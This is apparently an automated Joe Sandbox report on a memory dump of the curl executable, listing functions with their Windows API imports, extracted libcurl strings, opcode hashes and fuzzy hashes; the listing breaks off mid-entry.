Couldn't bind to interface '%s', xrefs: 000000013F4A2BF2
if!, xrefs: 000000013F4A2BDA
bind failed with errno %d: %s, xrefs: 000000013F4A2ECB
host!, xrefs: 000000013F4A2C11
Local port: %hu, xrefs: 000000013F4A2ED8
Bind to local port %hu failed, trying next, xrefs: 000000013F4A2E1A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: htons$ErrorLastbindinet_ptonstrncmp$getsockname
String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
API String ID: 3536004664-1901189404
Opcode ID: 013b9911c718c5641d91d169b51c53b3d85e04f6a4959f12d9daef961f0da3cd
Instruction ID: fa1a99dfc3e69df687a469c5934dc66dc72a0eff5745917393eb0b63b226293a
Opcode Fuzzy Hash: 013b9911c718c5641d91d169b51c53b3d85e04f6a4959f12d9daef961f0da3cd
Instruction Fuzzy Hash: 4DB1DE76B1469086FB14CB26E4447EF77A4F748B84F44003AEE4A47A9AEB7CC71AD700

Function 000000013F484860 Relevance: 35.6, APIs: 4, Strings: 16, Instructions: 558filestringCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F484D1B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F484D29
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F484D31
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F484D6A

Strings

%127[^/ ]/%127[^;, ], xrefs: 000000013F484A57
Illegally formatted content-type field!, xrefs: 000000013F484F0B
Out of memory for field headers!, xrefs: 000000013F4847E4
Header file %s read error: %s, xrefs: 000000013F48481B
Out of memory for field header!, xrefs: 000000013F484F5C
filename=, xrefs: 000000013F484AF5
encoder=, xrefs: 000000013F484D8A
Cannot read from %s: %s, xrefs: 000000013F484D3E
File %s line %d: header too long (truncated), xrefs: 000000013F4847A4
headers=, xrefs: 000000013F484BB8
skip unknown form field: %s, xrefs: 000000013F484ECC
Field encoder not allowed here: %s, xrefs: 000000013F485022
Field headers not allowed here: %s, xrefs: 000000013F485049
Field content type not allowed here: %s, xrefs: 000000013F484FC4
type=, xrefs: 000000013F484A17
Field file name not allowed here: %s, xrefs: 000000013F484FF3

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errnofclosefopenstrerror
String ID: %127[^/ ]/%127[^;, ]$Cannot read from %s: %s$Field content type not allowed here: %s$Field encoder not allowed here: %s$Field file name not allowed here: %s$Field headers not allowed here: %s$File %s line %d: header too long (truncated)$Header file %s read error: %s$Illegally formatted content-type field!$Out of memory for field header!$Out of memory for field headers!$encoder=$filename=$headers=$skip unknown form field: %s$type=
API String ID: 3995271253-1934775981
Opcode ID: d852251414a389a647a202ab56620bc51f408d9758b91a900cd8d09d6851345f
Instruction ID: ce1d6cda7353b3a8084d1a038283040cf3ad1359737564ecea951de71a8437ef
Opcode Fuzzy Hash: d852251414a389a647a202ab56620bc51f408d9758b91a900cd8d09d6851345f
Instruction Fuzzy Hash: 5632D172A09BC041EB618F25A5107EF7FA1E346BD4F48412AEB9E077A9DB39C756C700

Function 000000013F490658 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 395fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,000000013F48843C), ref: 000000013F4906AF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,000000013F48843C), ref: 000000013F4906C0
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,000000013F48843C), ref: 000000013F490718
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 000000013F4908A4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 000000013F490A36
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 000000013F490B59

Strings

<stdin>, xrefs: 000000013F490B0E
.curlrc, xrefs: 000000013F490691, 000000013F4906D7
_curlrc, xrefs: 000000013F4906EF
%s:%d: warning: '%s' %s, xrefs: 000000013F490B32
%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 000000013F49098A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: freemalloc$__acrt_iob_funcfopen
String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
API String ID: 2533209365-1529230327
Opcode ID: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
Instruction ID: 913d50c766a249dfabcfc4f06c5c6be9fd7235f0d62fb22af49c3bc31ea14035
Opcode Fuzzy Hash: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
Instruction Fuzzy Hash: 2FF1C132B0179089FB658F7998503EF3BA1B715B98F48113DDA9A877E6DB398647C300

Function 000000013F4CF964 Relevance: 24.1, APIs: 16, Instructions: 148networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 000000013F4CF9B7
htonl.WS2_32 ref: 000000013F4CF9DE
setsockopt.WS2_32 ref: 000000013F4CFA08
bind.WS2_32 ref: 000000013F4CFA20
getsockname.WS2_32 ref: 000000013F4CFA39
listen.WS2_32 ref: 000000013F4CFA57
socket.WS2_32 ref: 000000013F4CFA6E
connect.WS2_32 ref: 000000013F4CFA8A
ioctlsocket.WS2_32 ref: 000000013F4CFAA8
accept.WS2_32 ref: 000000013F4CFADB
getsockname.WS2_32 ref: 000000013F4CFAF9
getpeername.WS2_32 ref: 000000013F4CFB19
closesocket.WS2_32 ref: 000000013F4CFB48
closesocket.WS2_32 ref: 000000013F4CFB55
closesocket.WS2_32 ref: 000000013F4CFB5E
closesocket.WS2_32 ref: 000000013F4CFB68

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
String ID:
API String ID: 2616969812-0
Opcode ID: a2301e0e64777f46fc069a29f359863964577d41eef0b18b96cf0da66c097ae0
Instruction ID: 4ef4dc453a901575ea40d4a811214f53702b2ee98e3b6183ab5715d1ac453fc5
Opcode Fuzzy Hash: a2301e0e64777f46fc069a29f359863964577d41eef0b18b96cf0da66c097ae0
Instruction Fuzzy Hash: B9616932B01B609AFB109FA1D8543DE33B5F744BA8F545439EE1A67A98DB3C8A56C700

Function 000000013F4A1D84 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 106libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1DA8
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1DC4
_mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F4A1DD7
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 000000013F4A1DF2
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1E09
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 000000013F4A1E34
GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 000000013F4A1E75
LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 000000013F4A1ECA

Strings

kernel32, xrefs: 000000013F4A1DA1
AddDllDirectory, xrefs: 000000013F4A1DFF
LoadLibraryExA, xrefs: 000000013F4A1DBA

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: AddressDirectoryLibraryLoadProcSystem$HandleModule_mbspbrk
String ID: AddDllDirectory$LoadLibraryExA$kernel32
API String ID: 2824739505-3327535076
Opcode ID: 4434697843a5cd4062081c14776d37e9057b5a8912e9a210e3dd3141d5cb97da
Instruction ID: 3b312bd0e9ab95965fb4b8cd10649f9dfba8e2b4535df97efbceb3d29753ef19
Opcode Fuzzy Hash: 4434697843a5cd4062081c14776d37e9057b5a8912e9a210e3dd3141d5cb97da
Instruction Fuzzy Hash: A5418A31F0578486FF549B66A9543AB2791AB88FD0F48453CDD5A077E1EE3CC64B8B10

Function 000000013F499B60 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 447COMMON

Download Yara Rule

Strings

file, xrefs: 000000013F499C5B
https, xrefs: 000000013F499CD0
%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 000000013F49A039
%%25%s], xrefs: 000000013F499DD2
file://%s%s%s, xrefs: 000000013F499C91

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: %%25%s]$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
API String ID: 0-1669851433
Opcode ID: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
Instruction ID: 154fd7899fbe17368017c799cb492c9d9326f638583e451971a371f4191191c3
Opcode Fuzzy Hash: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
Instruction Fuzzy Hash: F4128C32B09B8585EBA58F15E9443EB73A0F755B94F188139DE4D077A9EB39CA47C300

Function 000000013F497BAC Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 414stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F497FBD
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F497FC6
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F497FDF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F497FE7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F497FF2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F497FFD

Strings

%02d:%02d:%02d%n, xrefs: 000000013F497F62
GMT, xrefs: 000000013F497E9F
%02d:%02d%n, xrefs: 000000013F497F98
%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 000000013F497DCD

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errno$strtol
String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
API String ID: 3596500743-988243589
Opcode ID: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
Instruction ID: 08586e7ac5820b9a729d2572a8d0dfaa1eb875d7474d03d3ac626cd656263433
Opcode Fuzzy Hash: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
Instruction Fuzzy Hash: 5FF1B572F00A058AFB24CB79D9003EF77A1B7957A8F55423EDE2A576D4E7388A06C740

Function 000000013F490C74 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 69COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F490D9C

Strings

%5I64d, xrefs: 000000013F490C89
%4I64dG, xrefs: 000000013F490D64
%4I64dM, xrefs: 000000013F490CF7
%2I64d.%0I64dM, xrefs: 000000013F490CBD
%4I64dk, xrefs: 000000013F490CA2
%4I64dP, xrefs: 000000013F490D8D
%4I64dT, xrefs: 000000013F490D80
%2I64d.%0I64dG, xrefs: 000000013F490D18

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
API String ID: 1488884202-2102732564
Opcode ID: b84edea642b1bcae355f1b7feebe49c5b6dde67c4707f370d7fcafed3e67bde2
Instruction ID: 7c39dabee7babeea8e0254dbca3dcd5a06530984ff52731c04fa7e412a39e3c7
Opcode Fuzzy Hash: b84edea642b1bcae355f1b7feebe49c5b6dde67c4707f370d7fcafed3e67bde2
Instruction Fuzzy Hash: A0214F70F1AA4853FF18CBA9E410BEB02705798784FD4663AE91E563E2E77C5747C240

Function 000000013F4944A4 Relevance: 16.5, APIs: 2, Strings: 7, Instructions: 730COMMON

Download Yara Rule

Strings

.%ld, xrefs: 000000013F4947F2
(nil), xrefs: 000000013F494DB0
(nil), xrefs: 000000013F494D10
, xrefs: 000000013F4946DD
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 000000013F4949EE, 000000013F494A9F
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 000000013F4944F2, 000000013F4949E7, 000000013F494A98
%ld, xrefs: 000000013F49478E

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strncmp
String ID: $%ld$(nil)$(nil)$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1114863663-3012073033
Opcode ID: 4182dc489f97b54357e9e53eb259c5ad35331cb2cf4078041a25781322b9f17f
Instruction ID: e27bc82ef333f18361726084bc8386124de9dd1d4c9b1a168b45f48ba18e882d
Opcode Fuzzy Hash: 4182dc489f97b54357e9e53eb259c5ad35331cb2cf4078041a25781322b9f17f
Instruction Fuzzy Hash: 87523877B0868486F7358B25F444BEB6791B7447A8F148329EE5A07BE9DA3DCB478300

Function 000000013F4AADC8 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 516COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4AAF56

Strings

No connections available., xrefs: 000000013F4AB5AB
host, xrefs: 000000013F4AB4D3
No more connections allowed to host: %zu, xrefs: 000000013F4AB59D
NTLM-proxy picked AND auth done set, clear picked, xrefs: 000000013F4AB698
Re-using existing connection #%ld with %s %s, xrefs: 000000013F4AB4E6
NTLM picked AND auth done set, clear picked, xrefs: 000000013F4AB669
proxy, xrefs: 000000013F4AB4C8
No connections available in cache, xrefs: 000000013F4AB703

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection #%ld with %s %s$host$proxy
API String ID: 1488884202-538710404
Opcode ID: 8dc9be468ea26cb0de46b3d46b72c649454127cfe13b841e7db7d65930c7eda4
Instruction ID: 1d2904506aa448b1f7e54f816401153ef1bfefb77252902cb6f1d357e62a0dcb
Opcode Fuzzy Hash: 8dc9be468ea26cb0de46b3d46b72c649454127cfe13b841e7db7d65930c7eda4
Instruction Fuzzy Hash: 01424832A01BC185FF959F25D9503EA27E5F749B88F08413ADE4D4B39AEF34C66A8350

Function 000000013F4C0804 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 291fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000198,?,00000190,?,00000000,00000000,?,000000013F4AA023), ref: 000000013F4C0892
fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4C08B3
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4C0B92

Strings

machine, xrefs: 000000013F4C0AAE, 000000013F4C0B03
, xrefs: 000000013F4C08E3, 000000013F4C0B3B
macdef, xrefs: 000000013F4C0AE9
default, xrefs: 000000013F4C0B1D
login, xrefs: 000000013F4C0A76
password, xrefs: 000000013F4C0A91

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fclosefgetsfopen
String ID: $default$login$macdef$machine$password
API String ID: 1391696698-416575051
Opcode ID: 9175fc009790da5bbd3967eee8ae968053c610d9281e760e031c449c6a281ab2
Instruction ID: c8f25d1798693d2d713efe97484eb1ecbd31e68195263d1ed5ecac6d01c225b8
Opcode Fuzzy Hash: 9175fc009790da5bbd3967eee8ae968053c610d9281e760e031c449c6a281ab2
Instruction Fuzzy Hash: 54C1D432A0978491FF65CB2994543EB67E0AB44B94F08613DDD8E877F9EA38CB06C700

Function 000000013F49F458 Relevance: 14.5, APIs: 1, Strings: 6, Instructions: 2276COMMON

Download Yara Rule

Strings

SESS, xrefs: 000000013F4A0F1A
FLUSH, xrefs: 000000013F4A0FDF
RELOAD, xrefs: 000000013F4A1001
ignoring failed cookie_init for %s, xrefs: 000000013F4A1056
Set-Cookie:, xrefs: 000000013F4A113F
ALL, xrefs: 000000013F4A0EAA

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
API String ID: 0-3179978524
Opcode ID: a57bdd88991d34b424dd8bc290a644bb890760003a0c993fa800d3274b4d58e6
Instruction ID: c3d0eca4f8f1f2b93525a6220e39358b3753650cb689d9af602c2165260c2aaf
Opcode Fuzzy Hash: a57bdd88991d34b424dd8bc290a644bb890760003a0c993fa800d3274b4d58e6
Instruction Fuzzy Hash: C423B132B0568086FE798E6CD5883EF3691E385744F18853EC68A477E5EB39875BDB00

Function 000000013F4A7888 Relevance: 14.4, Strings: 11, Instructions: 650COMMON

Download Yara Rule

Strings

Server doesn't support multiplex yet, wait, xrefs: 000000013F4A79B8
Found pending candidate for reuse and CURLOPT_PIPEWAIT is set, xrefs: 000000013F4A82C8
Found bundle for host: %p [%s], xrefs: 000000013F4A798A
Multiplexed connection found, xrefs: 000000013F4A828E
Can not multiplex, even if we wanted to, xrefs: 000000013F4A7A38
Server doesn't support multiplex (yet), xrefs: 000000013F4A79E5
can multiplex, xrefs: 000000013F4A7975
Connection #%ld is still name resolving, can't reuse, xrefs: 000000013F4A7AFC
Could multiplex, but not asked to, xrefs: 000000013F4A7A17
serially, xrefs: 000000013F4A797C
Connection #%ld isn't open enough, can't reuse, xrefs: 000000013F4A7B26

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: Can not multiplex, even if we wanted to$Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to$Found bundle for host: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found$Server doesn't support multiplex (yet)$Server doesn't support multiplex yet, wait$can multiplex$serially
API String ID: 0-1297456373
Opcode ID: 83fb8cc1dab0a848df4c46f72800c2eb3c5ba2e0d09a085450e1782fe9c11796
Instruction ID: 0a6884115782966d40cf43837fe150e97eb5905df012e89e908e06d4b4656bea
Opcode Fuzzy Hash: 83fb8cc1dab0a848df4c46f72800c2eb3c5ba2e0d09a085450e1782fe9c11796
Instruction Fuzzy Hash: D452A532A057C145FFB68B3186507FB6BA1F795B88F08513DDE890B799DB288B4AC710

Function 000000013F4A88D8 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 359stringCOMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4A898B
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,00000000,?,?,00000000,?,000000013F4AB888,?,?,00000000,000000013F49C297), ref: 000000013F4A8DDE

Strings

file, xrefs: 000000013F4A8A98, 000000013F4A8DC3
Protocol "%s" not supported or disabled in libcurl, xrefs: 000000013F4A8E9C
https, xrefs: 000000013F4A8B01
%s://%s, xrefs: 000000013F4A897D
Switched from HTTP to HTTPS due to HSTS => %s, xrefs: 000000013F4A8B90
http, xrefs: 000000013F4A8ABF

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintfstrtoul
String ID: %s://%s$Protocol "%s" not supported or disabled in libcurl$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
API String ID: 1031268025-4054226901
Opcode ID: 1c040d91785db0d8f209e6b24edb27ca7e1a24069e8536de83636f8cddd94bba
